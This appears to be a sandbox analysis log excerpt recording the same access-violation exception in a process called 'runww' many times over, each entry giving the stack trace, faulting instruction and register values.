__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
__exception__ May 23, 2021, 10:27 a.m.	stacktrace: _vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31 GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120 _CallPattern@8+0x267 runww+0x1ffe7 @ 0x41ffe7 _CallPattern@8+0x119f runww+0x20f1f @ 0x420f1f _go@4-0x1e16e runww+0x1c02 @ 0x401c02 _go@4-0x1e2c1 runww+0x1aaf @ 0x401aaf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84 exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58 exception.instruction: cmp byte ptr [eax + 7], 5 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 499288 exception.address: 0x77419e58 registers.esp: 1634172 registers.edi: 6553600 registers.eax: 4294967288 registers.ebp: 1634216 registers.edx: 0 registers.ebx: 0 registers.esi: 0 registers.ecx: 6553600	1
